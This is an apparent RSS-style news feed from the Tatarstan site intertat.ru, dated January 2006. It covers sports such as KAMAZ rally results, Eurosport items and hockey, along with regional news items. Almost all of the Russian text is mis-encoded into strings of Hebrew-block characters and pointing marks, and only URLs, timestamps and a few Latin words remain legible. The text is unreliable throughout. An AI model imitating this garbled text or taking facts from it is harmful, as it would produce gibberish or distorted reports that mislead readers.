ִּׁ ײױׂ־ֱֹּ׃װֿ׳ ֲּ ֱֻׂװֻֿ ֹ ֱֻװֵֵַֹֿׂ־: «חֱּּֿ־ֳִ ְֵֹֽװ ׳ ֻֿ־׃װׂױֳֹֹֻ ׃׳ָֹֿ ַׂױֿ׳ֹֻֿ׳ ֳֵּ ִׁׂ װֵָ־ֵֹ׃ָֹֻ ֵֽֽֿ־װֿ׳, ֻֿװֵֿׂ ־ֹֹֻֽֿ ֱֲֽֿֿׂ ־ֵ ׃ֿֿװ׳ֵװ׃װ׳ױֵװ װֵֽ, ֻֿװֵֿׂ ֱֳֶֹֹּֿ״־ֿ ֱֱִֵֹֻּֿׂׂ׳ֱ־ ֹֹֽ ׳ װֵָ־ֵֹ׃ֻֿ ִֻֿױֵֽ־װֱֳֹֹ. נֱׂ׳ֱֹּ-ֵ׃װ״ ׀ֱׂ׳ֱֹּ. י ֿ־ֹ ִֵֹ־ ִּׁ ׳׃ֵָ». …עֱ׳ֱֹֿׂ׳ֱׁ ַׂױֿ׳ֹֻ ־ֱ 180 ֱִַׂױ׃ֿ׳ ֿװ־ֿ׃ֹװֵּ״־ֿ ־ֱ׀ֱׂ׳ֵּ־ֹׁ ׀ֵׂ׳ַֿֿ װֱ׀ֱ ֱֹּּׂ, הֵ עֿ ֱִֹּֽ ־ֵ ׃ֻׂ׳ֱּ ׃ֵּ. י װֿ ֲֹּ ׃ֿ׳׃ֵֽ ־ֵ ׀ֱֻֿױ־ֵ ׃ֵּ.קֱײ־ֵֿ ֿװֵֹֹּ 28 «הֱֱֱֻׂ» ֿװ ׀ִִֵׂױָֹ ׳ װֽֿ, װֿ ֿ־ ׃ ׃ֱַֽֿֿ ־ֱֱֱּ ־ֿ׃ֹװ ֻֿׁׂ ׳ֱׂײֵ־־ ׃׀ֿׂװֹ׳־ ֱֱָֻׂװֵׂ. ק ־ֵֽ ־ֵװ װֱֳִֹֹֿׂ־־ַֿֿ ׀ֱַּֿֿׂ, ֹ ׀ֵׂ׳ ׃װֱׂװ ֱ ־ֵ׃ֻּֿ״ֻֿ ֱ׃ֿ׳ ִֿ מֿ׳ַֿֿ ֱִַֿ - װֿ ־ֵ ׀ֱֲֿׂ ׃ֹּ, ־ֵ װֵׂ־ֹֿׂ׳ֱֻ, ־ֵ ֿױ ׀ִֵֵׂ ֹּ׃׃ֱֲֿ־ֱֳֹֽ ֹ ַֿ׃װֹֽׁ ׃װֳֹּֿ - װֿ ױײֵ ֱֵּׂ״־ֱׁ, ׀ֿ ׳׃ֵֽ ֱֻֿ־ֱֽ ֱֹּּׂ־ַֿֿ ײֱ־ֱׂ ֱ׳װֲֹּֽֿֿ״־ֱׁ ֱִֹֻֿׂׂ, ־ֵ ׀ְֱֱֿׁׂ ֲֹֻֿֿ. נֿׂװׁײֵ־־ֿ׃װ״ ױײֵ ׀ֵׂ׳ָ װֱ׀ֿ׳ ֽֿײֵװ ׳ֲֹװ״ ֹ ֵֹֻּֿ ְֲַּֿֿ, ֻװֿ ׀ֿ־ֱִֵֵװ׃ׁ ־ֱ ׃ּױֱ ֹ ׃ֱ׃װֹּ׳ױְ ֶֹֻױ ־ֱ װֿװֱֱֹּװֵֿׂ ױֱִֹ.ןֱַׂ־ֱֹװֿׂ ַֿ־ֹֻ ֱֲֵֹּֿ, װֿ ֱֲֿ ׀ֿׂװױֱַּ״׃ָֹֻ ׃׀ֳֵױֱ׃װֱֻ ֲױִױװ ִֿ׃װֿ־ ׳ֵָֹֹֻּ ֵֽֽֿ־װֿ׳ גֱָֹ ׃ ִֿ־ֵֹֽֿ־־ֽ ־ֱ׳ֱ־ֵֹֽ. י ִֵ׃װ׳ֹװֵּ״־ֿ, 83 ׃ֻֿֿׂ׃װ־ָ ֵֹֻּֽֿװֱׂ ׀ֿ ױֻֿ, ׀ּױװְֱֵ ׃ִֵֹׂ ָּֽֿֿ׳ װֱׂ׃׃ֵ ׃ ־ֵ׃ֻֿ־ֱֵֹֽֽ ׳ֱֹׂײֱֹֽ, ׀ֱִֵֹֽֽֿ ֹ ׃׀ױ׃ֱֹֻֽ ׳ ֱֽׂװֵ ִֿײִֹֽׁ ־ֹֹ־ - ֹׂװֵּ״־ ֱֲּ״ֱֽ ִּׁ ׳ֿ׃װֿׂײֵ־־ָ ֲֵּּֿ״ֹֻֿ׳ ֹ «׃ֵֽׂװ״» ִּׁ װֵָ־ֹֹֻ, ׃ֲֹֹּ ׃׀ֵ׃״ ׀ֿ׀ֱװֹֿׂ׳ֱװ״ ׀ױֲֹֻּױ ֱִײֵ ױ ׃ֱָֽ ֱִָּׁ ְֲֹּװֵֵּ ֱ׳װֲֹּֽֿֿ״־ָ ֶֹ־װֿ׳. י ֵֿ־״ ֻ׃װֱװֹ. ‏װֲֿ ױִֵׂײֱװ״ ֽֿװֳֹֻּֿ ֹֹּ ֱ׳װֲֹּֽֿֿ״ ־ֱ װֱֻֿ ִֵַֿֿׂ, ׀ֿׁׂ׳ּׁװ״ ־ֱ׳ֹֻ ׀ֵֶֿׂ׃׃ֹֿ־ֱּ״־ֿ ֱ׳װֲֹּֽֿֿ״־ֿ ֻ׳ֲֹֹֹּׂ׃װֹֹֻ ׀ֹּֿׂ׃״ ׳׃ֵׂ״ֵ ֱֲ׃ְּֿװ־ֿ ׳׃ֵֽ ַֿ־ֱֹֻֽ.נֵׂ׳ֽ ׳ ֱֻּ׃׃ֵ ַׂױֿ׳ֹֻֿ׳ ֿ׃װֱ׳ֹּ ׀ִֿ ֵֻּֿ׃ֱֹֽ «־ֵ׀ֹׂ׳ֵװֹּ׳ֵ» ֵֹֻּֽֿװׂ ׃׀ֳֵױֱ׃װֱֻ ֿׂ׃׃ֹ׃ֹֻ ֹֻ׀ֱײ ׳ ׃ֿ׃װֱ׳ֵ ׀ֹּֿװֱ קֱֱִֹֹּֽׂ ‏ֱַֹ־ֱ, װױֱֽׂ־ֱ ףֵֵֽ־ֱ סֻױֲֿ׳ֱ ֹ ֱֵָֽ־ֱֹֻ ףֵֵַׁׂ ףֱ׳ֿ׃װֹ־ֱ ־ֱ כבםבתֵ -4911. כֱֻ ׃ֱֲֵֿֿװ ׀ֵׂ׃׃-׃ֵֵֻׂװֱׂ״ ֱֻֽֿ־ִ «כבםבת_םֱ׃װֵׂ» בֵֻּ׃ֵ ֲִֹֹּֿֿ־, ֵַֿ ֱֵַֻּּֿ, ֵֻֿׂׂ׃׀ֿ־ִֵ־װ EUROSPORT װּֿ״ֻֿ ֱֳֻּֿ ֻֽֿׁ ֹ ֲִָֹּֿֿ׃ׁ ֵֽײִֵֽֿװֹֹֽׁ, ֵֻֽֽֿ־װֹׂױׁ ֹׁ־ֵֿ ׀ָֿֿׂײִֵ־ֵֹ ‏ֱַֹ־ֽ ֱֽׂװֿ ִֿײִֹֽׁ װֱׂ׃׃. ף׀ױ׃װׁ 2 ֹֽ־ 20 ׃ֵֻ. ֶֹ־ֱֹ ׃ֻֿֿׂ׃װ־ַֿֿ ױֱ׃װֱֻ ִֿ׃װַֹ י׳ֵֻֿ ֹװֱּ״ׁ־׃ַֻֿֿ ׀ֹּֿװֱ םֱ׃׃ֹֽֿ גֱֹֿ־ֱ. ֹֻ׀ֱײ ֱֲֹּׂ״ֱֳ הֵ בֵ׳ִֵ ־ֱ פֱװֵׂ ׀ֱֱֻּֿ װֵׂװֹ ֵׂױּ״װֱװ, ױ׃װױ׀ֹ׳ ֱֱֻֽֿ׳׃ֹֻֽ ַֿ־ֱֹֻֽ 3 ֹֽ־. 15 ׃ֵֻ. כבםבת, ׳ִֵֽֿ זֱִֹׂױ׃ֽֿ כֱֲֹֿׂ׳ֽ, ֱ׳ֵֹּׂ ׀ָֿֿׂײִֵ־ֵֹ ׀ֵׂ׳ַֿֿ ׃׀ֳֵױֱ׃װֱֻ װֱֳִֹׂװ״ ׳װֽֿׂ, ׃ ֿװ׃װֱ׳ֱ־ֵֹֽ ֿװ װֿ׳ֱֱֹׂ ׀ֿ ֱֻֽֿ־ִֵ ׀ֿװֹ ־ֱ ׀ֱּֿ׃ֱ. כֱֻ ׃װֱּֿ ֹ׳ֵ׃װ־ֿ ױװ״ ׀ֿײֵ, ׀ֿװֹ ׳ֵ׃״ ׃ֻֿֿׂ׃װ־ֿ ׃׀ֳֵױֱ׃װֻֿ כֱֲֹֿׂ׳ ֵּ ׳ ִֹֹּׂױְֵ ַׂױ׀׀ֵ, ־ֿ ֱ ׃ֵֽ״ ֵֹֻּֽֿװֿׂ׳ ִֿ ֶֹ־ֱֹ ַׂױֿ׳ֹֻ ׀ֹּֿׂ׃״ ׃װֵׂ־ֿײֹװ״ ׀ֿ ׀ֹֹׂ־ֵ ־ֵ׀ֱִֻּֿֿ ׃ֿ ׃ֳֵ׀ֵּ־ֵֹֽ. נֱֻֿ ׀ֹׂ׳ִֹֹּֿ ׳ ֱֲֵֵֿׂ ׃ֿ׃װֿׁ־ֵֹ װֿװ ׳ֱײ־ ױֵּ, ׀ֿװֵֹּׁׂ ׀ֿװֹ ׀ֱּֿ׃ֱ. מֵ ֲּֿֿֿ׃״ ֲֵ ׀ְֵֹֻּׂ־ֹ ֹ ױ כבםבתֱ N514, ׳ִֵַֽֿֿֿ ףֵֵֵַֽׂ עֵֵװ־ֹֻֿ׳ֽ. מֿ׳ֹֻֿ ־ֱ ֱֱִֻֿׂ׳׃ֻֿ װֱׂ׃׃ֵ, ֿ־ ־ֵ ׃ױֵּֽ ׃ִָֿױ ׀ִֵֵּֿֿׂװ״ ֵַׁׂ׳ױְ ּֿ׳ױֻױ, ֹ ֹֻ׀ֱײױ ׀ֹּֿׂ׃״ ֱװֱׂװֹװ״ ׀ֿװֹ ֱ׃, װֲֿ ֿ׃׳ֲִֹֿֿװ״ ױ׳ֹׁ ׀ֿ ׃ֱֵֽ ֿ׃ֹ ַׂױֿ׳ֹֻ. פֱֹֻֽ ֱֲֽֿֿׂ װֵׂװֹ ֱֱֻֽֿ׳׃ֹֻ ֹֻ׀ֱײ ֱ־ּׁ ׀ֿ ֹװֱַֽֿ ׀ֵׂ׳ַֿֿ ִ־ׁ 51 ֵֽ׃װֿ.קֱֵׂ ֱַּ׳־ֽ ׀ֵׂ׀ׁװ׃װ׳ֵֹֽ ־ֱ ׀ױװֹ ׃׀ֿׂװֹ׳־ֿ ֱֻ׳ֱּ״ֱִֻ ׃װֱֹּ ַֿׂ־ֵ ֲֵָׂװ בּ״ֱַׂ׳ֵ. י׳ֹֹּ׃װֱׁ ַֹֿׂ׃װֱׁ װֱׂ׃׃ֱ ׃ ַּֿֿ׳ֻֿׂױײֹװֵּ״־ֹֽ ׳ֱֹׂײֱֹֽ, ׀ֿֿׂ ־ְֱׁׁׂ ׳ װׂױִ־ֿ׀ִָֹֽֿֿׂױְ ִֿֿׂײ־ױְ ׃ֻּֿׁװ״, ֱֻֻ ֹ ׳ֱֵׂ, ־ֵ ֵֹֽ־ֱֹּ ׃׳ֵֿ ׃ױװֹ ִֿ ׃ֱַֽֿֿ ֶֹ־ֱֹ ׃׀ֳֵױֱ׃װֱֻ. מֿ ׳׃ֵ װֿ ־ֵ ֿ׃װֱ־ֿ׳ֹּֿ ־ֱ׃װױ׀ֱװֵּ״־ַֿֿ ׀ֿׂ׳ֱ קֱֱִֹֹּֽׂ ‏ֱַֹ־ֱ.ן־ ִֵֿׂײֱּ ׳װֿׂױְ ׀ֲִֵֿױ ׀ִִֿׁׂ ׃ִֵֹׂ ַׂױֿ׳ֹֻֿ׳. ‏װֲֿ ׀ִֵֵּֿֿׂװ״ ֲִֵֿֿׂײ״ֵ ׃׀ֳֵױֱ׃װֱֻ ׀ֿׂװׁײֵ־־ֿ׃װ״ְ 115 ֻֽ ־ֱ ׀ױװֹ ֻ םֱֱֵַּ ֵֽױ ׀ֿװֲֵֿׂ׳ֱּֿ׃״ ִַָֹּֿ 2 ֱ׃ֱ ֹ 1 ׃ֵֻ.1 ֹֽ־. 50 ׃ֵֻ. ׀ֱַֹּֿׂׂ ֿׂ׃׃ֹ׃ֻֽֿױ ֹֻ׀ֱײױ ֱֲֳֵֹּׂ הֵ בֵ׳ִֵֿ ־ֱ פֱװֵׂ. 4 ֹֽ־.30 ׃ֵֻ. ױ׃װױ׀ֹּ ׀ֲִֵֹֿװְֵּ ׳װַֿֿֿׂ װֱ׀ֱ ֱֹּּׂ «לֹ׃׃ֱֲֿ־-הֱֱֻׂ 2006» ֹװֱּ״ׁ־׃ֹֻ ֹֻ׀ֱײ םֱ׃׃ֹֽֿ גֱֹֿ־ֱ ־ֱ י׳ֵֻֿ.ב ׳ֿװ ֵֵ ִֹֿ־ ֱֵּׂ״־ ׀ֵׂװֵ־ִֵ־װ ־ֱ ֱֱִֻֿׂ׳׃ֵֹֻ ־ֱֱִַׂ - ֵָ פֱֽֿ פֵֹֻֽֿ ׀ֿװֵׂ׀ֵּ ׳ֱֵׂ ֱ׳ְֱֹׂ. וַֿ פבפעב ־ֱ ִֿ־ֽֿ ֹ ֻׂױװָ ׳ֱֹׂײֵ ׀ֵֵׂ׳ֵׂ־ױֱּ׃״ ֹ ֱֲֹֻּֿֿׂ׳ֱֱּ ִַֿֿׂױ ׃ִֵּֿ׳ֱ׳ֹֽ ֱ ־ֹֽ ַֿ־ֱֹֻֽ. ק װֽֿ ֹ׃ֵּ ֹ כבםבתֱֽ כֱֲֹֿׂ׳ֱ ֹ עֵֵװ־ֹֻֿ׳ֱ. ןֱַׂ־ֱֹװֱֽֿׂ ֱֹּּׂ ׀ֹּֿׂ׃״ ׃ֿׂ־ֿ ׀ֹׂ־ֱֹֽװ״ ֵֵׂ־ֹׁ ׀ֿ ױֵװױ ׳ֵֵֽׂ־ֹ ִּׁ ׳׃ֵָ, ֻװֿ ׃ִֵּֿ׳ֱּ ֱ פֹֹֻֽֽֿֿ. עֵֵ־ֵֹ ֲּֿ ׀ֹׂ־ׁװֿ װֱֵֻֿ: ׀ֵׂ׳ֵ 8 ֹֻ׀ֱײֵ, ֻֿװֵֿׂ ֱֵָֹּ ׀ִֵֵׂ ֵַֿ פבפעןך ׃ֱָֿׂ־ְׁװ ׀ֱֱֻֿ־־ֵֿ ׳ֵֽׁׂ. ק׃ֵֽ ֿ׃װֱּ״־ֽ ֲױִֵװ ֱ׀ֹ׃ֱ־ֿ ִֿ־ֿ ׳ֵֽׁׂ ׀ָֿֿׂײִֵ־ֹׁ װֱ׀ֱ - 2. 17 ֹֽ־.פֱֹֻֽ ֱֲֽֿֿׂ, ִֵֿׂײֱ׳ װֹׂ ׀ֲִֵֿ ׀ִִֿׁׂ ־ֱ ִ׳ױָ ֵ׳ֿׂ׀ֵ׃ָֹֻ ֹ ִֿ־ֽֿ ֱֱֶֹֻׂ־׃ֻֽֿ װֱ׀ֱָ ֱֹּּׂ «לֹ׃׃ֱֲֿ־-הֱֱֻׂ 2006» ֹֻ׀ֱײ ק. ‏ֱַֹ־ֱ ׳ֱַּֿ׳ֵּׁװ װױׂ־ֹׂ־ױְ װֱֲֳֹּױ ׳ ֱֻּ׃׃ֵ ַׂױֿ׳ֹֻֿ׳.ק ןבן «ףֵ׳ֵֿׂ-ֱ׀ֱִ־ֵ ֱַֹֽ׃װֱּׂ״־ֵ ־ֵֶװֵ׀ֿׂ׳ִֿ» - ־ֿ׳ ֵַ־ֱֵּׂ״־ ִֵֹֻׂװֿׂhttp://intertat.ru/index.php?id=80161ןבן «ףֵ׳ֵֿׂ-ֱ׀ֱִ־ֵ ֱַֹֽ׃װֱּׂ״־ֵ ־ֵֶװֵ׀ֿׂ׳ִֿ» «בכ «פֱׂ־׃־ֵֶװ״» ׳ֱַּֿ׳ֹּ ־ֿ׳ ֵַ־ֱֵּׂ״־ ִֵֹֻׂװֿׂ - עױ׃װֽׁ טֹ׃ֱֵ׳, ׃ֲֹֹּֿֿ ׳ ֻֽֿ׀ֱ־ֹֹ.ֻֿ־ֱֹֻֽֿTue, 03 Jan 2006 10:57:22 +0300ןבן «ףֵ׳ֵֿׂ-ֱ׀ֱִ־ֵ ֱַֹֽ׃װֱּׂ״־ֵ ־ֵֶװֵ׀ֿׂ׳ִֿ» «בכ «פֱׂ־׃־ֵֶװ״» ׳ֱַּֿ׳ֹּ ־ֿ׳ ֵַ־ֱֵּׂ״־ ִֵֹֻׂװֿׂ - עױ׃װֽׁ טֹ׃ֱֵ׳, ׃ֲֹֹּֿֿ ׳ ֻֽֿ׀ֱ־ֹֹ.עױ׃װֽׁ מֱֹּֿ׳ֹ טֹ׃ֱֵ׳ ִֹּֿׂ׃ׁ 8 ֱֽׂװֱ 1966 ֱִַֿ. ןֻֿ־ֹּ פְֵֽ־׃ֹֻ ַֿ׃ױֱִׂ׃װ׳ֵ־־ ־ֵֶװֱֵַֿ׳ ױ־ֹ׳ֵׂ׃ֹװֵװ ׀ֿ ׃׀ֱֳֵֹּ״־ֿ׃װֹ «ֱֱֲֿׂׂװֱֻ ֹ ֻ׃׀ּױֱװֱֳֹׁ ־ֵֶװׁ־ָ ֹ ֱַֿ׳ָ ֵֽ׃װֿֿׂײִֵ־ֹ». פׂױִֿ׳ױְ ִֵׁװֵּ״־ֿ׃װ״ ׳ ־ֵֶװׁ־ֿ ׃ֵֵֶׂ ־ֱֱּ ׳ מחהץ «הׂױײֱֲ־ֵֶװ״». ף 1989 ׀ֿ 2001 ַַ. װׂױִֹּ׃ׁ ׳ פננ «כֱַּֽֿ־ֵֶװֱֵַ» ןןן «לץכןךל-תֱ׀ֱִ־ֱׁ ףֲֹֹׂ״». ף 2001 ֱִַֿ - ֱֵֽ׃װֹװֵּ״ ֵַ־ֱֵּׂ״־ַֿֿ ִֵֹֻׂװֱֿׂ ׀ֿ ׀ֹֿׂ׳ִֿ׃װ׳ױ, ֱַּ׳־ ֹ־ײֵ־ֵׂ, ֹ.ֿ. ֵַ־ֱֵּׂ״־ַֿֿ ִֵֹֻׂװֱֿׂ ןבן «ףֵ׳ֵֿׂ-ֱ׀ֱִ־ֵ ֱַֹֽ׃װֱּׂ״־ֵ ־ֵֶװֵ׀ֿׂ׳ִֿ». עױ׃װֽׁ טֹ׃ֱֵ׳ ױֱ׃װ׳ֿ׳ֱּ ׳ װֱָֹֻ ֻׂױ׀־ָ ׀ֵֻֿׂװֱָ, ֱֻֻ ׃ֿֿׂױײֵ־ֵֹ ֲֵֻֿװֿ׳ ־ֵֶװֲִֵֹֿ ־ֱ ֵֽ׃װֿֿׂײִֵ־ָֹׁ ֲִֵֹֿ־ֵ־ֹׁ פננ «כֱַּֽֿ־ֵֶװֱֵַ»; ׀ֹׂ׳ִֵֵ־ֵֹ ֲֵֻֿװֿ׳ ןבן «ףתםמ» ׳ ׃ֿֿװ׳ֵװ׃װ׳ֵֹ ׃ װֲֵֿׂ׳ֱ־ֹֹֽׁ ׀ֵּֽֿׂ־־ֿ ֲֵֿ׀ֱ׃־ֿ׃װֹ; ױ׳ֵֵֹּ־ֵֹ ׀ֿׂ׀ױ׃ֻ־ֿ ׃׀ֿ׃ֲֿ־ֿ׃װֹ גֱּװֹ׃ֻֿ פׂױֲֿ׀ֿׂ׳ִֿ־ֿ ףֹ׃װֵֽ: ֱׂ׃ֻֿ־׃ֵׂ׳ֱֳֹׁ ֵװֵָׂ ־ֵֶװֵ׀ֱֵֵֹֻׂ׳ְֱָֹ ׃װֱ־ֳֹ, ׳׳ִֿ ־ֿ׳ֿ ַּֿֿ׳־ֿ ־ֵֶװֵ־ֱ׃ֿ׃־ֿ ־ֱ מנף «כֱֵֹֻּ־ֿ» ןבן «ףתםמ». ס׳ֵּׁװ׃ׁ ֱ׳װֽֿֿׂ ֲֵֵּֿ ִֵ׃ׁװֹ ֲֵֹֿׂװֵ־ֹ ֹ ֱֳׂ׀ִֵּֿׂײֵ־ֹ, ־ֱ׀ֱׂ׳ֵּ־־ָ ־ֱ ׀ֿ׳ֵ־ֵֹ ־ֱִֵײ־ֿ׃װֹ ֱֲֿׂװ װֵָ־ֵַֹּֿֿ׃ַֻֿֿ ֲֿֿׂױִֿ׳ֱ־ֹׁ. מֱֱַׂײִֵ־ ׀ֵֿװ־ֿ ֱַֽֿׂװֿ ןבן «בכ «פֱׂ־׃־ֵֶװ״».צֵׂװ׳ֱֹֽ ַֿ־ׁ ׳ ־ֿ׳ִַֿֿ־ְְ ־ֿ״ ׳ פֱװֱׂ׃װֱ־ֵ ׃װֱֹּ ׳ֿ׃ֵֽ״ ֵּֿ׳ֵֻhttp://intertat.ru/index.php?id=80174ק מֿ׳ִַֿֿ־ֵֹ ׀ֱִׂ־ֹֹֻ ׃ 31 ֱֲִֵֻׁׂ ׀ֿ 1 ׁ־׳ֱׁׂ ׳ פֱװֱׂ׃װֱ־ֵ ׀ֹּֿֿֿׂ 37 ׀ֿײֱֿׂ׳, ־ֱ ֻֿװָֿׂ ׀ֲַֹֹּֿ ׳ֿ׃ֵֽ״ ֵּֿ׳ֵֻ. ףִֵֹׂ ־ָֹ - ֱֽװ״ ׃ ִ׳ױֵָּװ־ֹֽ ֲֵֵׂ־ֻֽֿ.ֲֵֿ׃װ׳ֿTue, 03 Jan 2006 10:00:57 +0300ק מֿ׳ִַֿֿ־ֵֹ ׀ֱִׂ־ֹֹֻ ׃ 31 ֱֲִֵֻׁׂ ׀ֿ 1 ׁ־׳ֱׁׂ ׳ פֱװֱׂ׃װֱ־ֵ ׀ֹּֿֿֿׂ 37 ׀ֿײֱֿׂ׳, ־ֱ ֻֿװָֿׂ ׀ֲַֹֹּֿ ׳ֿ׃ֵֽ״ ֵּֿ׳ֵֻ. ףִֵֹׂ ־ָֹ - ֱֽװ״ ׃ ִ׳ױֵָּװ־ֹֽ ֲֵֵׂ־ֻֽֿ. ןװ ַֿ־ׁ ׀ֿ׃װֱֱִּֿׂ ֵװֵׂ ֵּֿ׳ֱֵֻ, ׀ֿײֱׂ־ֽ ױֱִּֿ׃״ ׃׀ֱ׃װֹ ׃ֵֽ״ ֵּֿ׳ֵֻ, ׃ֱֲֵֿֿװ ֿװִֵּ ׀ֿׂ׀ֱֱַ־ִ חֱּ׳־ַֿֿ ױ׀ֱׂ׳ֵּ־ֹׁ ם‏ף עז ׀ֿ עפ.37-ֵּװ־ׁׁ ײֵ־ֹ־ֱ ֹ ֵֵ ִ׳ױֵָּװ־ֹ ֲֵֵׂ־ֻֿ ׀ֲַֹֹּֿ ׳ מֿ׳ֵֹֽֿ־׃ֻֽֿ ֱֿׂ־ֵ ֹ-ֱ ִֵװ׃ֻֿ ֱּֿ׃װֹ ׃ ַֿ־ֵֽ.נֿײֱׂ ֲּ ֱֶֹֻ׃ֹֿׂ׳ֱ־ 1 ׁ־׳ֱׁׂ ׳ ֱ׃װ־ֽֿ ִֵֽֿ ׃ֱֵּ ףױּ״ֵ-גֱ ׳ 20.45. םֱֵּ־״ֹֻ הֹ־ֹ׃ֱּֽ ֱַֹּׂ ׳ֵּֿ ׀ֵֹֻ ׃ֿ ׃׀ֱֹֹֻֽ, ׳ װֿ ׳ֵֽׁׂ ֱֻֻ ֵַֿ ׀״ׁ־ֱׁ ֱֽװ״ ׃׀ֱֱּ ׳ ׃ֿ׃ִֵ־ֵ ֻֽֿ־ֱװֵ. צֵ־ֹ־ֱ ׀ֿׂ׃־ױֱּ׃״ ֿװ ֱ׀ֱֱָ ֱִֽ, ׳ ׀ֱ־ֵֹֻ ׀ֲֵֿײֱֱּ ֻ ׀ֿײֹּֽ ִֹֿׂװֵּֽׁ, ֻֿװֵֿׂ ײֹֹּ ־ֵ׀ֱִֵֻּֿױ. ףֲֹֿֿ׳ ֹֽ ֿ ׀ֿײֱֵׂ, ֿ־ֱ ׳׃׀ֽֿ־ֱֹּ ֿ ׃־ֵ ֹ ׳ֵׂ־ױֱּ׃״ ׳ ִֽֿ. קװֹ ֹ ֵַַֿֿׁׂ ׃װֵֿׂ־ֹׁ ֿ־ֱ ױײֵ ־ֵ ׃ֱַּֽֿ.ק ִׂױַָֹ ׃ּױֱָׁ ׀ֹֹׂ־ֿ ׀ֿײֱֱׂ ׃װֱֹּ ־ֵֿ׃װֿֿׂײ־ֿ׃װ״ ׀ֹׂ ֻױֵׂ־ֹֹ ֹ ּֿױ׀ֿװֲֵֵּׂ־ֵֹ ׃׀ֹׂװ־ֹֽ ־ֱ׀ֹװֱֹֻֽ. פֱֻ, 31 ֱֲִֵֻׁׂ ׀ֿײֱׂ ׀ֵֹּֿֿׂ ׳ כֱֱ־ֹ ־ֱ ױֳֵֹּ 2-ׁ חֱֿ׳ֱׁ, ׳ ֻ׳ֱׂװֵֹׂ ׀ׁװֹװֱײ־ַֿֿ ֱִֽֿ ־ֱ 4 װֱײֵ, ִֵַ ׀ֿׂײֹ׳ֱּ ־ֱֲֵֿׂװְֱֹ 38-ֵּװ־ֹ ֽױײֹ־ֱ. ן־ ֿװֱׂ׳ֹּ׃ׁ ױֱַׂ־ֽ ֱַֽֿ. תֱװֿ ׀ֿײֱׂ־ֽ ױֱִּֿ׃״ ׃׀ֱ׃װֹ װָֹֿׂ ײֹּ״ֳֿ׳ ֱִֽֿ, ׳ ֻ׳ֱׂװֹׂ ֻֿװָֿׂ ׀ֿׂ׃ֹּֿ׃ׁ ִֵֹֻ ִֽ.«מֿ׳ִַֿֿ־ֵֵ ֱׂ־ִֵ׳ױ ־ֱ עֿײִֵ׃װ׳ֿ» ׀ִֵֿׂװ ׳ כֱֱ־ֹhttp://intertat.ru/index.php?id=801168 ׁ־׳ֱׁׂ ׳ ֻֿ־ֳֵׂװ־ֽֿ ֱֵּ פֱװֱׂ׃ֻֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ֿ ֱֶֹּֽֿׂ־ֹֹ ֵֹֽ־ֹ חֱֲִױּּ פױֱֻׁ ׀ִֵֿׂװ ֻֿ־ֳֵׂװ «מֿ׳ִַֿֿ־ֵֵ ֱׂ־ִֵ׳ױ ־ֱ עֿײִֵ׃װ׳ֿ».ֻױּ״װױֱׂTue, 03 Jan 2006 08:51:41 +03008 ׁ־׳ֱׁׂ ׳ ֻֿ־ֳֵׂװ־ֽֿ ֱֵּ פֱװֱׂ׃ֻֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ֿ ֱֶֹּֽֿׂ־ֹֹ ֵֹֽ־ֹ חֱֲִױּּ פױֱֻׁ ׀ִֵֿׂװ ֻֿ־ֳֵׂװ «מֿ׳ִַֿֿ־ֵֵ ֱׂ־ִֵ׳ױ ־ֱ עֿײִֵ׃װ׳ֿ», ׃ֲֹֹּֿֿ Intertat.ru ׳ ֱֶֹּֽֿׂ־ֹֹ. נֱִׂ־ֹ־ֱׁ ׀ֱֱַֽֽֿׂׂ ׀ִַֿֿװֿ׳ֵּ־ֱ ןװִֵּֽֿ ֿ׀ֵׂ־ֿ-ֱֵֻֽׂ־ֿ ֽױֹֻ פֱװַֿ׃ֱֶֹּֽֿׂ־ֹֹ. מֱ ֻֿ־ֳֵׂװֵ ׀ֿׂ׳ױֱװ ׀ֿ׀ױּׁׂ־ֵ ׀ֵ׃־ֹ ׳ ֹ׃׀ּֿ־ֵ־ֹֹ עִֵֵ חֱֹּֽֿ׳ֿ, קֱֱִֹֹּֽׂ קֱ׃ֹּ״ֵ׳ֱ, חױֵּ״ ֹ קֱֱִֹֹּֽׂ וֵֵֵֽׂ׳ָ, ֱ־׃ֱֲּֽׁ ׃ֹֻׂ׀ֱֵ «כֱֽ׀ֱ־ֱֵּּ» ׀ִֿ ׂױֻֿ׳ִֿ׃װ׳ֽֿ ק.םֱֻױָֿ. «עױֲֹ־» ־ֱ ׀ֵַֿֿׂ ־ֿ׳ַֿֿ ׃ֵֿ־ֱhttp://intertat.ru/index.php?id=80154כֱִֿׂ׳ֵ ֵֹֽ־ֵ־ֹׁ, ׀ֹֿׂ׃ִֵֵֹ ׳ «עױֲֹ־ֵ», ־ֵ ֿ׃װֱֹּ׃״ ־ֵ ֱֵֵֽ־־ֹֽ ׀ֻּֿֿ־־ֱֹֹֻֽ ֱֻֽֿ־ִ. ׃׀ֿׂװSun, 01 Jan 2006 11:00:23 +0300כֱִֿׂ׳ֵ ֵֹֽ־ֵ־ֹׁ, ׀ֹֿׂ׃ִֵֵֹ ׳ «עױֲֹ־ֵ», ־ֵ ֿ׃װֱֹּ׃״ ־ֵ ֱֵֵֽ־־ֹֽ ׀ֻּֿֿ־־ֱֹֹֻֽ ֱֻֽֿ־ִ. נֹֽֽֿֿ ׳ֳֵֹ-׀ִֵֵֹׂ־װֱ ֻּױֱֲ ב־ִֵׁׂ טֱֿ׳ֱ, ֵֵ ִׁׂ ֱֲֿׂװ־ֹֻֿ׳ ׀ּֿױֹֹּ ױ׳ִֵֵּֽֿ־ֹׁ ֿ ׀ֱֵֵֻׂׂ־ֹֹ ׃ ־ֹֹֽ װׂױִֿ׳ָ ֿװ־ֵֿ־ֹ. ן׃װֱֵװ׃ׁ װּֿ״ֻֿ ־ֱִֵׁװ״׃ׁ, װֿ ־ֿ׳ֽֿױ ׀ִֵֵֹׂ־װױ ֻּױֱֲ בֵֻּ׃ֱ־ִׂױ חױ׃ֵ׳ױ ױֱִ׃װ׃ׁ ׀ֹׂ׳ֵּ״ ֻ ֱֲֿׂװֵ ־ֱ׃װָֹֿׁ ׀ֵֶֿׂ׃׃ֹֿ־ֱּֿ׳ ׃׳ֵַֿֿ ֱִֵּ, ֱ «עױֲֹ־» ׀ִֿ־ֵֹֽװ׃ׁ ־ֱ ֲֵֵּֿ ׳׃ֻֿױְ ׃װױ׀ֵ־״ ֱׂ׳ֹװֹׁ, װֿ ׳ ׀ֵׂ׳ױְ ִֵֵֿׂ״ ׃ֱֻײֵװ׃ׁ ־ֱ ֹ־ֱֶׂ׃װׂױֻװױֵׂ.3 ׁ־׳ֱׁׂ 